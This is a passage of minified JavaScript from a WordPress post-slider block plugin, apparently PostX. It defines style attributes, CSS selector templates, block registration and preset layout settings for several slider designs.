}"}]},dotHoverWidth:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li.slick-active button { width:{{dotHoverWidth}}; }"}]},dotHoverHeight:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li.slick-active button { height:{{dotHoverHeight}}; }"}]},dotSpace:{type:"object",default:{lg:"4",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots { padding: 0 {{dotSpace}}; } \n          {{ULTP}} .slick-dots li button { margin: 0 {{dotSpace}}; }"}]},dotVartical:{type:"object",default:{lg:"-20",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots { bottom:{{dotVartical}}; }"}]},dotHorizontal:{type:"object",default:{lg:""},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots { left:{{dotHorizontal}}; }"}]},dotBg:{type:"string",default:"#9b9b9b",style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { background:{{dotBg}}; }"}]},dotHoverBg:{type:"string",default:"#9b9b9b",style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover, \n          {{ULTP}} .slick-dots li.slick-active button { background:{{dotHoverBg}}; }"}]},dotBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button"}]},dotHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover, \n          {{ULTP}} .slick-dots li.slick-active button"}]},dotRadius:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { border-radius: {{dotRadius}}; }"}]},dotHoverRadius:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover, \n          {{ULTP}} .slick-dots li.slick-active button { border-radius: {{dotHoverRadius}}; }"}]},dotShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button"}]},dotHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover, \n          {{ULTP}} .slick-dots li.slick-active button"}]},contentVerticalPosition:{type:"string",default:"bottomPosition",style:[{depends:[{key:"contentVerticalPosition",condition:"==",value:"topPosition"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"contentVerticalPosition",condition:"==",value:"middlePosition"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"contentVerticalPosition",condition:"==",value:"bottomPosition"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},contentHorizontalPosition:{type:"string",default:"centerPosition",style:[{depends:[{key:"contentHorizontalPosition",condition:"==",value:"leftPosition"},{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-leftPosition { justify-content:flex-start; }"},{depends:[{key:"contentHorizontalPosition",condition:"==",value:"centerPosition"},{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-centerPosition { justify-content:center; }"},{depends:[{key:"contentHorizontalPosition",condition:"==",value:"rightPosition"},{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-rightPosition { justify-content:flex-end; }"}]},contentAlign:{type:"string",default:"center",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content-inner { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-start;}"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content-inner { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: center;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content-inner { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-end;}"}]},contenWraptWidth:{type:"object",default:{lg:"100",unit:"%"},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-content { width:{{contenWraptWidth}}; }"},{depends:[{key:"layout",condition:"!=",value:"slide2"}],depends:[{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content .ultp-block-content-inner { width:{{contenWraptWidth}}; }"}]},contenWraptHeight:{type:"object",default:{lg:""},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-content { height:{{contenWraptHeight}}; }"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-content { height:{{contenWraptHeight}} !important; }"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner { height:{{contenWraptHeight}} !important; }"}]},slideBgBlur:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"},{key:"layout",condition:"!=",value:"slide6"}],selector:"{{ULTP}} .ultp-block-content-inner { backdrop-filter: blur({{slideBgBlur}}px); }"}]},contentWrapBg:{type:"string",default:"#00000069",style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content { background:{{contentWrapBg}}; }"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content { background:{{contentWrapBg}}; }"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",default:"#00000069",style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content:hover { background:{{contentWrapHoverBg}}; }"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content:hover { background:{{contentWrapHoverBg}}; }"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content:hover"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content:hover"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"6",bottom:"6",left:"6",right:"6",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content { border-radius:{{contentWrapRadius}}; }"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content { border-radius:{{contentWrapRadius}}; }"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content:hover { border-radius: {{contentWrapHoverRadius}}; }"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content:hover { border-radius: {{contentWrapHoverRadius}}; }"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:0,right:5,bottom:15,left:0},color:"rgba(0,0,0,0.15)"},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:0,right:10,bottom:25,left:0},color:"rgba(0,0,0,0.25)"},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner:hover"}]},contentWrapPadding:{type:"object",default:{lg:{top:"27",bottom:"27",left:"",right:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content { padding: {{contentWrapPadding}}; }"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content { padding: {{contentWrapPadding}}; }"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner { padding: {{contentWrapPadding}}; }"}]},slideWrapMargin:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:"slide6"}],selector:"{{ULTP}} .ultp-block-content { margin: {{slideWrapMargin}}; }"},{depends:[{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .ultp-block-content { margin: {{slideWrapMargin}}; }"},{depends:[{key:"layout",condition:"==",value:"slide8"}],selector:"{{ULTP}} .ultp-block-content { margin: {{slideWrapMargin}}; }"}]},headingText:{type:"string",default:"Post Slider #2"},...(0,o.t)(["advanceAttr","heading","meta","category","readMore","query"],[],[{key:"queryNumPosts",default:{lg:5}},{key:"queryNumber",default:5},{key:"loadingColor",style:[{selector:"{{ULTP}} .ultp-loading .ultp-loading-blocks div , \n          {{ULTP}} .ultp-loading .ultp-loading-spinner div { --loading-block-color: {{loadingColor}}; }"}]},{key:"metaStyle",default:"noIcon"},{key:"metaList",default:'["metaAuthor","metaDate"]'},{key:"metaColor",default:"#F3F3F3"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"catTypo",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:18,unit:"px"},spacing:{lg:7.32002,unit:"px"},transform:"uppercase",weight:"300",decoration:"none",family:""}},{key:"catSacing",default:{lg:{top:0,bottom:0,unit:"px"}}},{key:"readMoreColor",default:"var(--postx_preset_Primary_color)"},{key:"catBgHoverColor",default:{openColor:0,type:"color",color:"#b3b3b3"}},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"#037fff"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:"#0c32d8"}},{key:"readMoreSacing",default:{lg:{top:30,bottom:"",left:"",right:"",unit:"px"}}},{key:"readMorePadding",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}}}]),V4_1_0_CompCheck:a.O,...(0,i.b)()}},32633:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(73504),n=l(22105),r=l(1106);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-slider-2/","block_docs"),s(r,{icon:(0,o.createElement)("div",{className:"ultp-block-inserter-icon-section"},(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-slider-2.svg"}),!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-pro-block"},"Pro")),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/post-slider2.svg"}},edit:i.Z,save:()=>null})},50814:(e,t,l)=>{"use strict";l.d(t,{P:()=>o});const o={slide1:{autoPlay:!0,excerptShow:!1,readMore:!1,imgOverlay:!1,sliderGap:0,height:{lg:550,unit:"px"},slidesCenterPadding:{lg:"160",sm:"100",xs:"50"},imgBgBlur:"0",contentWrapBg:"#00000069",contentWrapHoverBg:"#00000069",slideBgBlur:"",contentAlign:"center",contentVerticalPosition:"bottomPosition",contenWraptHeight:{lg:"",ulg:""},contentWrapRadius:{lg:"10"},contentWrapHoverRadius:{lg:"10"},contentWrapPadding:{lg:{top:"27",bottom:"27",left:"24",right:"24",unit:"px"},sm:{top:"27",bottom:"27",left:"16",right:"16",unit:"px"}},titleColor:"#fff",titleHoverColor:"rgba(107,107,107,1)",titleTypo:{decoration:"none",family:"",height:{lg:"36",unit:"px"},openTypography:1,size:{lg:"24",unit:"px"},weight:"300",transform:"uppercase"},metaColor:"#FFFFFFA8",metaHoverColor:"#a5a5a5",metaTypo:{decoration:"none",family:"",height:{lg:"20",unit:"px"},openTypography:1,size:{lg:"12",unit:"px"},weight:"300"},metaStyle:"noIcon",metaList:'["metaAuthor","metaDate"]',metaSpacing:{lg:6,unit:"px",ulg:"px"},metaSeparator:"emptyspace",metaDateFormat:"j M Y",metaAuthorPrefix:"",contenWraptWidth:{lg:"100",unit:"%",ulg:"%"},metaColor:"#FFFFFFA8",metaSeparator:"dot",metaSpacing:{lg:"13",unit:"px",ulg:"px"},catRadius:{lg:"0",unit:"px"},catBgColor:{color:"",openColor:1,type:"color"},catBgHoverColor:{color:"",openColor:1,type:"color"},catTypo:{decoration:"none",family:"",height:{lg:"15",unit:"px"},openTypography:1,size:{lg:"12",unit:"px"},weight:"300",transform:"uppercase",spacing:{lg:"7.32",unit:"px"}},dotWidth:{lg:"5",unit:"px"},dotHeight:{lg:"5",unit:"px"},dotHoverWidth:{lg:"8",unit:"px"},dotHoverHeight:{lg:"8",unit:"px"},dotVartical:{lg:"-20",unit:"px"},dotBg:"#9b9b9b",dotHoverBg:"#9b9b9b",dotRadius:{lg:{top:"30",bottom:"30",left:"30",right:"30",unit:"px"}},dotHoverRadius:{lg:{top:"30",bottom:"30",left:"30",right:"30",unit:"px"}},arrowBg:"",arrowHoverBg:"",arrowColor:"#000",arrowHoverColor:"#000",arrowSize:{lg:"80",unit:"px"},arrowVartical:{lg:"45",sm:"16",xs:"0",unit:"px"},arrowStyle:"leftAngle2#rightAngle2",arrowBorder:{width:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},type:"solid",color:"rgba(255,255,255,1)",openBorder:1},arrowHoverBorder:{width:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},type:"solid",color:"rgba(67,67,67,1)",openBorder:1},wrapMargin:{lg:{top:"",bottom:"50",unit:"px",left:"",right:""}}},slide2:{autoPlay:!0,fade:!0,slidesToShow:{lg:"1",sm:"1",xs:"1"},excerptShow:!0,readMore:!0,imgOverlay:!1,sliderGap:0,height:{lg:550,unit:"px"},imgWidth:{xs:"20",ulg:"%",unit:"%"},contenWraptWidth:{lg:71,unit:"%",ulg:"%",usm:"%",sm:100,xs:100},contentWrapBg:"#644737",contentWrapHoverBg:"#644737",contentAlign:"left",contenWraptHeight:{lg:"100",ulg:"%"},contentWrapRadius:{lg:"0"},contentWrapHoverRadius:{lg:"0"},contentVerticalPosition:"middlePosition",contentWrapPadding:{lg:{top:"0",bottom:"0",left:"60",right:"30",unit:"px"},xs:{top:"24",bottom:"24",left:"24",right:"24",unit:"px"}},titleLength:"12",titleColor:"#fff",titleHoverColor:"#fff6",titleTypo:{decoration:"none",height:{lg:"",unit:"px"},openTypography:1,size:{lg:"28",xs:"22",unit:"px"},weight:"400"},titlePadding:{lg:{top:"15",bottom:"5",unit:"px"}},metaColor:"#FFFFFFA8",metaHoverColor:"#a5a5a5",metaTypo:{decoration:"none",height:{lg:"",unit:"px"},openTypography:1,size:{lg:"16",unit:"px"},weight:"300"},catTypo:{decoration:"none",height:{lg:"12",unit:"px"},openTypography:1,size:{lg:"12",unit:"px"},spacing:{lg:"",unit:"px"},weight:"300",transform:""},excerptColor:"#d7d7d8d8",excerptTypo:{decoration:"none",height:{lg:"",unit:"px"},openTypography:1,size:{lg:"16",unit:"px"},weight:"300",transform:""},catRadius:{lg:"0",unit:"px"},catBgColor:{color:"#ffffff21",openColor:1,type:"color"},catBgHoverColor:{color:"#ffffff21",openColor:1,type:"color"},readMoreColor:"#fff",readMoreHoverColor:"#fff7",readMoreTypo:{decoration:"none",family:"",height:{lg:"12",unit:"px"},openTypography:1,size:{lg:"12",unit:"px"},weight:"300",transform:"uppercase"},dotBg:"#644737",dotHoverBg:"#644737",dotWidth:{lg:"6",unit:"px"},dotHeight:{lg:"6",unit:"px"},dotHoverWidth:{lg:"10",unit:"px"},dotHoverHeight:{lg:"10",unit:"px"},dotVartical:{lg:"-27",unit:"px"},dotRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},dotHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},metaSeparator:"dot",metaSpacing:{lg:"13",unit:"px",ulg:"px"},arrowBg:"#503a2d",arrowHoverBg:"#614F44",arrowColor:"#fff",arrowHoverColor:"#fff",arrowWidth:{lg:"40",unit:"px"},arrowHeight:{lg:"40",unit:"px"},arrowSize:{lg:"20",unit:"px"},arrowVartical:{lg:"0",ulg:"px"},arrowRadius:{lg:"0",ulg:"px"},arrowHoverRadius:{lg:"0",ulg:"px"},arrowStyle:"leftAngle2#rightAngle2",arrowBorder:{width:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},type:"solid",color:"rgba(255,255,255,1)",openBorder:1},arrowHoverBorder:{width:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},type:"solid",color:"rgba(67,67,67,1)",openBorder:1},wrapMargin:{lg:{top:"",bottom:"50",unit:"px",left:"",right:""}}},slide3:{autoPlay:!0,excerptShow:!1,readMore:!1,height:{lg:550,unit:"px"},contentAlign:"center",imgHeight:{lg:50,unit:"%"},slidesToShow:{lg:"3",sm:"2",xs:"1"},fade:!1,sliderGap:"10",dots:!1,layout:"slide3",imgRadius:{lg:{top:"10",right:"10",bottom:"",left:"",unit:"px"},unit:"px"},imgOverlay:!1,contentWrapBg:"rgba(241,241,241,1)",contentWrapHoverBg:"",contenWraptHeight:{lg:45,unit:"%"},contentWrapHoverRadius:{lg:{top:"",bottom:"10",left:"10",right:"",unit:"px"}},contentWrapRadius:{lg:{top:"",bottom:"10",left:"10",right:"",unit:"px"}},contentWrapHoverRadius:{lg:{top:"",bottom:"10",left:"10",right:"",unit:"px"}},contentWrapPadding:{lg:{top:"16",bottom:"32",left:"16",right:"16",unit:"px"}},titleLength:"8",titleColor:"rgba(22,22,22,1)",titleHoverColor:"rgba(22,22,22, .4)",titleTypo:{openTypography:1,size:{lg:"22",unit:"px"},height:{lg:"32",unit:"px"},decoration:"none",family:"",weight:"700",transform:"capitalize"},arrowStyle:"leftArrowLg#rightArrowLg",arrowWidth:{lg:"56",unit:"px"},arrowHeight:{lg:"56",unit:"px"},arrowSize:{lg:"27",nit:"px",ulg:"px"},arrowVartical:{lg:"-32",unit:"px",ulg:"px"},arrowColor:"rgba(255,255,255,1)",arrowHoverColor:"rgba(67,67,67,1)",arrowBg:"rgba(67,67,67,1)",arrowHoverBg:"rgba(255,255,255,1)",arrowBorder:{width:{top:"2",right:"2",bottom:"2",left:"2",unit:"px"},type:"solid",color:"rgba(255,255,255,1)",openBorder:1},arrowHoverBorder:{width:{top:"2",right:"2",bottom:"2",left:"2",unit:"px"},type:"solid",color:"rgba(67,67,67,1)",openBorder:1},arrowRadius:{lg:{top:"51",bottom:"51",left:"51",right:"51",unit:"px"}},arrowHoverRadius:{lg:{top:"51",bottom:"51",left:"51",right:"51",unit:"px"}},catSacing:{lg:{top:"5",bottom:"10",left:"",right:"",unit:"px"}},catPadding:{lg:{top:"4",bottom:"4",left:"9",right:"9",unit:"px"}},catTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:"",unit:"px"},transform:"uppercase",weight:"400",decoration:"none",family:""},catBgColor:{openColor:1,type:"color",color:"rgba(97,59,255,1)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catBgHoverColor:{openColor:1,type:"color",color:"rgba(97,59,255,1)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},metaSeparator:"verticalbar",metaColor:"rgba(118,118,118,1)",metaHoverColor:"rgba(97,59,255,1)",metaSpacing:{lg:"10",unit:"px",ulg:"px"},metaTypo:{openTypography:1,size:{lg:"11",unit:"px"},height:{lg:"",unit:"px"},weight:"400",decoration:"none",family:"",transform:"uppercase"},wrapMargin:{lg:{top:"",bottom:"0",unit:"px",left:"30",right:"30"}}},slide4:{autoPlay:!0,sliderGap:0,excerptShow:!0,readMore:!1,layout:"slide4",contentAlign:"left",centerItemScale:{lg:"1.08"},slidesToShow:{lg:"1",sm:"1",xs:"1"},height:{lg:500,unit:"px",ulg:"px"},slidesCenterPadding:{lg:"180",xs:"30"},slidesTopPadding:"20",slideBgBlur:"",contentWrapBg:"",contentWrapHoverBg:"",contentWrapRadius:{lg:"0"},contentWrapHoverRadius:{lg:"0"},contenWraptHeight:{lg:"",ulg:"%"},contenWraptWidth:{lg:"100",unit:"%",ulg:"%"},contentWrapPadding:{lg:{top:"",bottom:"50",left:"35",right:"35",unit:"px"}},titleLength:"9",titleColor:"#fff",titleHoverColor:"#a5a5a5",titlePadding:{lg:{top:"15",bottom:"5",unit:"px"}},titleTypo:{decoration:"none",height:{lg:"",unit:"px"},openTypography:1,size:{lg:"32",xs:"22",unit:"px"},weight:"700",style:"italic"},arrowSize:{lg:"31",unit:"px",ulg:"px"},arrowWidth:{lg:"40",unit:"px"},arrowHeight:{lg:"80",unit:"px",ulg:"px"},arrowVartical:{lg:"100",sm:"24",xs:"16",ulg:"px",usm:"px",uxs:"px"},arrowColor:"#fff",arrowHoverColor:"#fff",arrowBg:"rgba(44,44,44,0.7)",arrowHoverBg:"#503a2d",arrowBorder:{width:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},type:"solid",color:"rgba(255,255,255,1)",openBorder:1},arrowHoverBorder:{width:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},type:"solid",color:"rgba(67,67,67,1)",openBorder:1},arrowRadius:{lg:"0",ulg:"px"},arrowHoverRadius:{lg:"0",ulg:"px"},dotWidth:{lg:"15",unit:"px"},dotHeight:{lg:"2",unit:"px",ulg:"px"},dotHoverWidth:{lg:"22",unit:"px"},dotHoverHeight:{lg:"3",unit:"px",ulg:"px"},dotVartical:{lg:"15",unit:"px",ulg:"px"},dotBg:"rgba(255,255,255,1)",dotHoverBg:"rgba(255,255,255,1)",dotRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},dotHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},catTypo:{decoration:"none",height:{lg:"",unit:"px"},spacing:{lg:"",unit:"px"},openTypography:1,size:{lg:"12",unit:"px"},weight:"400",transform:"uppercase"},catColor:"rgba(96,96,96,1)",catHoverColor:"#a5a5a5",catBgColor:{openColor:1,type:"color",color:"rgba(255,255,255,1)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catBgHoverColor:{openColor:1,type:"color",color:"rgba(255,255,255,1)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catRadius:{lg:"0",unit:"px"},catSacing:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},catPadding:{lg:{top:"5",bottom:"5",left:"8",right:"8",unit:"px"}},imgOverlay:!0,imgOverlayType:"custom",overlayColor:{openColor:1,type:"gradient",color:"#0e1523",gradient:"linear-gradient(0deg,rgb(0,0,0) 0%,rgba(7,7,7,0) 100%)",clip:!1},imgOpacity:"0.61",imgHeight:{lg:"255",ulg:"px"},imgRadius:{lg:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},unit:"px"},readMoreTypo:{decoration:"none",family:"",height:{lg:"12",unit:"px"},openTypography:1,size:{lg:"12",unit:"px"},weight:"300",transform:"uppercase"},readMoreColor:"#fff",readMoreHoverColor:"#a5a5a5",metaSeparator:"slash",metaAuthorPrefix:"By",metaTypo:{decoration:"none",height:{lg:"",unit:"px"},openTypography:1,size:{lg:"12",unit:"px"},weight:"400"},metaColor:"rgba(255,255,255,1)",metaHoverColor:"#a5a5a5",metaSpacing:{lg:"6",unit:"px",ulg:"px"},excerptLimit:"23",excerptColor:"rgba(255,255,255,0.61)",excerptTypo:{decoration:"none",height:{lg:"28",xs:"16",unit:"px"},openTypography:1,size:{lg:"16",unit:"px"},weight:"400",transform:""},excerptPadding:{lg:{top:"10",bottom:"10",unit:"px"}},wrapRadius:{lg:{top:"23",right:"23",bottom:"23",left:"23",unit:"px"},unit:"px"},wrapMargin:{lg:{top:"",bottom:"",unit:"px",left:"",right:""}}},slide5:{fade:!0,autoPlay:!0,readMore:!1,excerptShow:!1,imgOverlay:!1,slideBgBlur:"6",contentAlign:"left",slidesToShow:{lg:"1",sm:"1",xs:"1"},layout:"slide5",imgWidth:{lg:"75",ulg:"%"},contentHorizontalPosition:"leftPosition",contentVerticalPosition:"bottomPosition",contenWraptWidth:{lg:"57",xs:"100",unit:"%",ulg:"%",uxs:"%"},contentWrapBg:"rgba(255,255,255,0.75)",contentWrapHoverBg:"rgba(255,255,255,0.75)",contentWrapRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},contentWrapHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},contentWrapPadding:{lg:{top:"20",bottom:"20",left:"24",right:"24",unit:"px"}},slideWrapMargin:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},titleColor:"rgba(40,74,0,1)",titleHoverColor:"rgba(40,74,0, .6)",titleTypo:{openTypography:1,size:{lg:"28",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",family:"",weight:"700",transform:"capitalize"},titlePadding:{lg:{top:"10",bottom:"0",unit:"px"}},titleLength:"5",arrowPos:"right",arrowSize:{lg:"20",unit:"px",ulg:"px"},arrowWidth:{lg:"38",unit:"px",ulg:"px"},arrowHeight:{lg:"38",unit:"px",ulg:"px"},arrowVartical:{lg:"278",unit:"px",ulg:"px"},prevArrowPos:{lg:"62",unit:"px"},nextArrowPos:{lg:"21",unit:"px"},arrowColor:"#284a00",arrowHoverColor:"#284a00",arrowBg:"rgba(255,255,255,1)",arrowHoverBg:"#e2e2e2",arrowRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},arrowHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},dotWidth:{lg:"6",unit:"px"},dotHeight:{lg:"6",unit:"px",ulg:"px"},dotHoverWidth:{lg:"10",unit:"px"},dotHoverHeight:{lg:"10",unit:"px",ulg:"px"},dotSpace:{lg:"4",unit:"px",ulg:"px"},dotVartical:{lg:"109",xs:"200",unit:"px",ulg:"px",uxs:"px"},dotHorizontal:{lg:"0",ulg:"px"},dotBg:"rgba(255,255,255,1)",dotHoverBg:"rgba(117,137,78,1)",catTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:"",unit:"px"},transform:"uppercase",weight:"500",decoration:"none",family:""},catColor:"rgba(40,74,0,1)",catHoverColor:"rgba(40,74,0,.5)",catBgColor: